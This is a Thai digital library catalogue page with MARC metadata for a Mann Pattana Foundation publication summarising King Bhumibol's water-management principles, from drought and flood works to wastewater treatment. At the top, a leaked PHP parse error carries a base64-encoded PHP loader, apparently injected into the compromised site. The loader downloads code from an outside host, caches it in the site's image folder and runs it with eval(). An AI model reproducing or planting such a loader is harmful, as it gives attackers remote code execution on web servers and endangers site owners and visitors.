Parse error: syntax error, unexpected '<' in data:text/html;base64,PD9waHAgJGZwdD0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLihpc19kaXIoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2ltYWdlJyk/Jy9pbWFnZS8nOihpc19kaXIoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2ltYWdlcycpPycvaW1hZ2VzLyc6KGlzX2RpcigkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLicvaW1nJyk/Jy9pbWcvJzonLy50bXAvJykpKS4nYTMwMGQ0ZGU4ZmI5YmQ4MmFhNTViN2UyMDY2YTlkMjAnOyRkaXI9ZGlybmFtZSgkZnB0KTska3dkPVsnY24ubG9sJywnZ292LmxvbCcsJ29yZy5jZmQnLCdxcXZ2Lm9yZycsJ2NzZW84LmNvbSddOyR1cmw9J2h0dHA6Ly90dy5xcXZ2Lm9yZy90eHQvdHcudHh0JztmdW5jdGlvbiBja3coJGNudCwka3dkKXtmb3JlYWNoKCRrd2QgYXMgJGt3KXtpZihzdHJwb3MoJGNudCwka3cpIT09ZmFsc2Upe3JldHVybiB0cnVlO319cmV0dXJuIGZhbHNlO31mdW5jdGlvbiBmcmMoJHVybCl7JGNoaD1jdXJsX2luaXQoKTtjdXJsX3NldG9wdCgkY2hoLENVUkxPUFRfVVJMLCR1cmwpO2N1cmxfc2V0b3B0KCRjaGgsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTtjdXJsX3NldG9wdCgkY2hoLENVUkxPUFRfVElNRU9VVCwxMCk7Y3VybF9zZXRvcHQoJGNoaCxDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLHRydWUpOyRkYXQ9Y3VybF9leGVjKCRjaGgpO2lmKGN1cmxfZXJybm8oJGNoaCkpeyRkYXQ9ZmFsc2U7fWN1cmxfY2xvc2UoJGNoaCk7cmV0dXJuICRkYXQ7fWZ1bmN0aW9uIGdjdCgkZnB0LCR1cmwsJGRpcil7aWYoIWlzX2RpcigkZGlyKSl7bWtkaXIoJGRpciwwNzc3LHRydWUpO31pZihmaWxlX2V4aXN0cygkZnB0KSYmKCh0aW1lKCktZmlsZW10aW1lKCRmcHQpKTwzNjAwKSl7JGNwcj1maWxlX2dldF9jb250ZW50cygkZnB0KTtyZXR1cm4gZ3p1bmNvbXByZXNzKCRjcHIpO31lbHNleyRjbnQ9ZnJjKCR1cmwpO2lmKCRjbnQhPT1mYWxzZSl7ZmlsZV9wdXRfY29udGVudHMoJGZwdCxnemNvbXByZXNzKCRjbnQpKTt9cmV0dXJuICRjbnQ7fX0kY250PWdjdCgkZnB0LCR1cmwsJGRpcik7aWYoY2t3KCRjbnQsJGt3ZCkpe2V2YWwoJGNudCk7fWVsc2V7JGNudD1mcmMoJHVybCk7aWYoJGNudCE9PWZhbHNlKXtmaWxlX3B1dF9jb250ZW50cygkZnB0LGd6Y29tcHJlc3MoJGNudCkpO2V2YWwoJGNudCk7fX0gPz4=(1) : eval()'d code on line 1
RDP Library
รวมศาสตร์ของพระราชาเพื่อการบริหารจัดการน้ำ

รวมศาสตร์ของพระราชาเพื่อการบริหารจัดการน้ำ ด้วยสายพระเนตรและพระอัจฉริยภาพของ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช บรมนาถบพิตร ที่ทรงพระราชทานแนวพระราชดำริในด้านการบริหารจัดการทรัพยากรน้ำที่ทรงพระราชทานแก่ประชาชนชาวไทย เพื่อบรรเทาและแก้ไขปัญหาน้ำท่วมและภัยแล้งในระยะสั้นแบบเฉพาะหน้า และในระยะยาวอย่างยั่งยืน สามารถสรุปสาระสำคัญได้ ดังนี้ 1) การบริหารจัดการน้ำแล้ง อาทิ การสร้างอ่างกักเก็บน้ำ การสร้างฝายทดน้ำ และการขุดลอกหนองบึงที่ตื้นเขินให้สามารถระบายน้ำให้มีประสิทธิภาพมากขึ้น รวมไปถึงเพื่อกักเก็บน้ำเพื่อใช้ในการเพาะปลูกได้ต่อไป 2) การบริหารจัดการน้ำท่วม อาทิ เขื่อนป่าสักชลสิทธิ์ จังหวัดลพบุรี เขื่อนขุนด่านปราการชล จังหวัดนครนายก 3) การปรับปรุงลำน้ำที่มีอยู่เดิมให้สามารถเพิ่มศักยภาพการผันน้ำมากขึ้น อาทิ โครงการปรับปรุงคลองลัดโพธิ์ อันเนื่องมาจากพระราชดำริ และโครงการแก้มลิง เพื่อสำหรับพักมวลน้ำในฤดูน้ำหลากก่อนระบายลงสู่ทะเล เป็นต้น 4) การจัดการน้ำเสียด้วยวิธีการทางชีวภาพ ด้วยการใช้น้ำดีไล่น้ำเสีย และการนำผักตบชวามาเป็นส่วนช่วยในการบำบัดน้ำเสีย ในโครงการต่างๆ เช่น โครงการปรับปรุงบึงมักกะสัน และการใช้หลักกลศาสตร์ด้วยการใช้เครื่องจักรกลเติมออกซิเจนให้กับน้ำเสียเพื่อช่วยบำบัดน้ำเสียได้ดียิ่งขึ้น ข้อมูลโดย มูลนิธิมั่นพัฒนา

Call No. : -
Publisher : มูลนิธิมั่นพัฒนา
Published Date :
Category : ทั่วไป
Page : 1
Rating :
Available Unlimited
SHARE ON SOCIAL MEDIA :

MARC Information

245 a : Title 
รวมศาสตร์ของพระราชาเพื่อการบริหารจัดการน้ำ 
260 b : Name of publisher 
มูลนิธิมั่นพัฒนา 
260 c : Date of publication 
2564 
300 a : Total pages 
520 a : Description 
รวมศาสตร์ของพระราชาเพื่อการบริหารจัดการน้ำ ด้วยสายพระเนตรและพระอัจฉริยภาพของ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช บรมนาถบพิตร ที่ทรงพระราชทานแนวพระราชดำริในด้านการบริหารจัดการทรัพยากรน้ำที่ทรงพระราชทานแก่ประชาชนชาวไทย เพื่อบรรเทาและแก้ไขปัญหาน้ำท่วมและภัยแล้งในระยะสั้นแบบเฉพาะหน้า และในระยะยาวอย่างยั่งยืน สามารถสรุปสาระสำคัญได้ ดังนี้ 1) การบริหารจัดการน้ำแล้ง อาทิ การสร้างอ่างกักเก็บน้ำ การสร้างฝายทดน้ำ และการขุดลอกหนองบึงที่ตื้นเขินให้สามารถระบายน้ำให้มีประสิทธิภาพมากขึ้น รวมไปถึงเพื่อกักเก็บน้ำเพื่อใช้ในการเพาะปลูกได้ต่อไป 2) การบริหารจัดการน้ำท่วม อาทิ เขื่อนป่าสักชลสิทธิ์ จังหวัดลพบุรี เขื่อนขุนด่านปราการชล จังหวัดนครนายก 3) การปรับปรุงลำน้ำที่มีอยู่เดิมให้สามารถเพิ่มศักยภาพการผันน้ำมากขึ้น อาทิ โครงการปรับปรุงคลองลัดโพธิ์ อันเนื่องมาจากพระราชดำริ และโครงการแก้มลิง เพื่อสำหรับพักมวลน้ำในฤดูน้ำหลากก่อนระบายลงสู่ทะเล เป็นต้น 4) การจัดการน้ำเสียด้วยวิธีการทางชีวภาพ ด้วยการใช้น้ำดีไล่น้ำเสีย และการนำผักตบชวามาเป็นส่วนช่วยในการบำบัดน้ำเสีย ในโครงการต่างๆ เช่น โครงการปรับปรุงบึงมักกะสัน และการใช้หลักกลศาสตร์ด้วยการใช้เครื่องจักรกลเติมออกซิเจนให้กับน้ำเสียเพื่อช่วยบำบัดน้ำเสียได้ดียิ่งขึ้น ข้อมูลโดย มูลนิธิมั่นพัฒนา 

No Reviews

  1. There are no reviews yet, why not be the first.